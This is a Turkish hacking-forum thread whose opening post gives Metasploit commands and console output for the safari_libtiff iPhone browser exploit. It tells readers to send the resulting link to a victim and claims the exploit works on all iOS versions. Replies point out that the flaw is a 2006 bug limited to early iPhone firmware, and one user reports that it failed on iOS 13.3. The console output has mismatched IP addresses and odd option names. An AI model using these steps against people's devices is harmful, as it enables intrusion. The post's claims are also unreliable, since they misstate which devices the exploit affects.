Apple [İphone] Hackleme [m.e.t.a sploit]

[Mysorfilox]

Merhaba Arkadaşlar Burada Apple (iphone) Hacklemeyi Göstereceğim

msfconsole

Sonra

use exploit/apple_ios/browser/safari_libtiff

Sonra

set URIPATH /

Sonra

set VRSHOST 192.168.41.171

Burada ki ip Benim Siz Kendi İp ve port Adresinizi Yazınız.

 set VRSPORT 8080

Sonra

run

"run" Dedikten Sonra Gelecek Cevap :
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 191.168.42.171:4444
msf5 exploit(apple_ios/browser/safari_libtiff) >
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.41.171:8080/
[*] Server started.


Elimizde Olan Bu Adresi Kurbana Atın Kurban Dosyayı İndirip Çalıştırdığında Size Böle Bir Cevap Gelecektir :


[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.41.171:8080/
[*] Server started.
msf5 exploit(apple_ios/browser/safari_libtiff) >
[*] 192.168.41.171 safari_libtiff - Sending exploit




Ve bukadar....


Alttaki Bir Örnektir








​

Database already started
The database appears to be already configured, skipping initialization

.;lxO0KXXXK0Oxl:.
,o0WMMMMMMMMMMMMMMMMMMKd,
'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
:KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
.KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
lWMMMMMMMMMMMXd:.. ..;dKMMMMMMMMMMMMo
xMMMMMMMMMMWd. .oNMMMMMMMMMMk
oMMMMMMMMMMx. dMMMMMMMMMMx
.WMMMMMMMMM: :MMMMMMMMMM,
xMMMMMMMMMo lMMMMMMMMMO
NMMMMMMMMW ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW. ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd ,0MMMMMMMMMMK;
.WMMMMMMMMMc 'OMMMMMM0,
lMMMMMMMMMMk. .kMMO'
dMMMMMMMMMMWd' ..
cWMMMMMMMMMMMNxc'. ##########
.0MMMMMMMMMMMMMMMMWc #+# #+#
;0MMMMMMMMMMMMMMMo. +:+
.dNMMMMMMMMMMMMo +#++:++#+
'oOWMMMMMMMMo +:+
.,cdkO0K; :+: :+:
:::::::+:
****sploit

=[ ****sploit v5.0.41-dev ]
+ -- --=[ 1914 exploits - 1074 auxiliary - 330 post ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ -- --=[ 4 evasion ]

msf5 > use exploit/apple_ios/browser/safari_libtiff
msf5 exploit(apple_ios/browser/safari_libtiff) > set URIPATH /
URIPATH => /
msf5 exploit(apple_ios/browser/safari_libtiff) > set VRSHOST 192.168.41.171
VRSHOST => 192.168.42.171
msf5 exploit(apple_ios/browser/safari_libtiff) > set VRSPORT 8080
VRSPORT => 8080
msf5 exploit(apple_ios/browser/safari_libtiff) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 191.168.42.171:4444
msf5 exploit(apple_ios/browser/safari_libtiff) >
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.41.171:8080/
[*] Server started.
msf5 exploit(apple_ios/browser/safari_libtiff) >
[*] 192.168.41.171 safari_libtiff - Sending exploit

Uyarı Bu Post Alıntıdır Alıntı Yapılan Video : [ame]https://www.youtube.com/watch?v=zgB8-9il0H4[/ame]​

 

[parrhesia0]

Cevap: Apple [İphone] Hackleme [****sploit]

Iphone kaç üzeri işe yarıyor?

 

[Mysorfilox]

Cevap: Apple [İphone] Hackleme [****sploit]

Iphone kaç üzeri işe yarıyor?

Tüm Versiyonlarda İşe Yarıyor Diye Biliyorum.

 

[The Casanova]

Deneyen var mı? Çalıştı mı?

 

[Mysorfilox]

Deneyen var mı? Çalıştı mı?

evt Ben Arkadaşımda Denedin

 

[ratio]

Sadece Jailbreakli (ios'un rootlu hali) cihazlarda çalışacaktır diye düşünüyorum. Çünkü JailBreaksiz cihazlar dışarıdan androiddeki gibi apk yüklemenize izin vermez. ?

 

[Mysorfilox]

Sadece Jailbreakli (ios'un rootlu hali) cihazlarda çalışacaktır diye düşünüyorum. Çünkü JailBreaksiz cihazlar dışarıdan androiddeki gibi apk yüklemenize izin vermez. ?

Apk Değil İmg Dosyası Bu.

 

[ratio]

Apk Değil İmg Dosyası Bu.

Ben apk demedim dostum, örnek verdim, Iphone cihazlara(şayet JailBreak yapılmadıysa), android cihazlarda internetten indirdiğiniz apklar gibi uygulamaları indirip, yükleyemezsiniz. Bildiğim kadarıyla rastgele bir şey de indirip yükleyemiyor olmanız gerekiyor.

 

[Mysorfilox]

Ben apk demedim dostum, örnek verdim, Iphone cihazlara, android cihazlarda internetten indirdiğiniz apklar gibi uygulamaları indirip, yükleyemezsiniz. Bildiğim kadarıyla rastgele bir şey de indirip yükleyemiyor olmanız gerekiyor.

işte O zmn Sızacak Kişi Bİ :mahcup:Yolunu Bulsun bEN Taktiği Paylaştım Benden Bukadar

 

[parrhesia0]

evt Ben Arkadaşımda Denedin

Arkadaşın telefonu jailbreakli mi?

 

[mertkancelik]

Ben apk demedim dostum, örnek verdim, Iphone cihazlara(şayet JailBreak yapılmadıysa), android cihazlarda internetten indirdiğiniz apklar gibi uygulamaları indirip, yükleyemezsiniz. Bildiğim kadarıyla rastgele bir şey de indirip yükleyemiyor olmanız gerekiyor.

iPhone cihazlarda artık internet üzerinden .pdf .exe gibi bir çok türde dosyayı indirirebiliyorsunuz indirilen öğeler Dosyalar adlı uygulamaya kaydediliyor

 

[Mysorfilox]

Arkadaşın telefonu jailbreakli mi?

Evet'DE niye Sordun

iPhone cihazlarda artık internet üzerinden .pdf .exe gibi bir çok türde dosyayı indirirebiliyorsunuz indirilen öğeler Dosyalar adlı uygulamaya kaydediliyor

Ve Sonunda Anlatan Ve Anlayan Çıktı))

 

[Anonim6]

https://bbs.pediy.com/thread-109316.htm
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3459
https://github.com/rapid7/****sploi.../exploits/apple_ios/browser/safari_libtiff.rb
https://lists.apple.com/archives/security-announce/2006/Aug/msg00000.html
https://wenku.baidu.com/view/263141294b73f242336c5f48.html

şey, işin aslı ilgili zafiyetin yayım tarihi bundan 14 sene öncesi, 2006. olay Apple'ın IPhone cihazının 1.00, 1.01, 1.02 ve 1.1.1 bellenim sürümleriyle beraberinde gelen TIFF kütüphanesinde yer alan bir bellek zafiyetinin sömürülmesine dayanıyor, zaten hemen ardından yama da gecikmiyor. anımsadığım kadarıyla IOS (IPhone OS) 13.3.1 çıkalı da çok olmadı. Jobs'ın gençliğinde sunduğu IPhone'u kullanmadığınız müddetçe endişelenmenize pek lüzum yok.

 

[parrhesia0]

https://bbs.pediy.com/thread-109316.htm
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3459
https://github.com/rapid7/****sploi.../exploits/apple_ios/browser/safari_libtiff.rb
https://lists.apple.com/archives/security-announce/2006/Aug/msg00000.html
https://wenku.baidu.com/view/263141294b73f242336c5f48.html

şey, işin aslı ilgili zafiyetin yayım tarihi bundan 14 sene öncesi, 2006. olay Apple'ın IPhone cihazının 1.00, 1.01, 1.02 ve 1.1.1 bellenim sürümleriyle beraberinde gelen TIFF kütüphanesinde yer alan bir bellek zafiyetinin sömürülmesine dayanıyor, zaten hemen ardından yama da gecikmiyor. anımsadığım kadarıyla IOS (IPhone OS) 13.3.1 çıkalı da çok olmadı. Jobs'ın gençliğinde sunduğu IPhone'u kullanmadığınız müddetçe endişelenmenize pek lüzum yok.

Tam da bunu anlamaya çalışıyordum.

 

[biltr023231]

Başarılı bir anlatım emeğe saygı , değerlendirebilecek insanlar için büyük bir yazılım fakat aklında apple kırılamaz öyle bişi yok o en iyi güvenliğe sahip açığı yok diyen arkadaşlar içinde üzülerek yorum kasmayalım diyorum...

Teşekkürler....

 

[Mysorfilox]

Başarılı bir anlatım emeğe saygı , değerlendirebilecek insanlar için büyük bir yazılım fakat aklında apple kırılamaz öyle bişi yok o en iyi güvenliğe sahip açığı yok diyen arkadaşlar içinde üzülerek yorum kasmayalım diyorum...

Teşekkürler....

Teşekkür Ederim.

 

[D3FALT]

iOS 13.3 sürüm jb siz sürümde denedim şimdi, linke tıkladığımda safari sunucuyu açmayı durdu/reddetti gibisinden bir yazı belirdi (dosya vs çıkmadı). Konsol session opened çıktısı verdi fakat takılı kaldı yani işe yaramadı.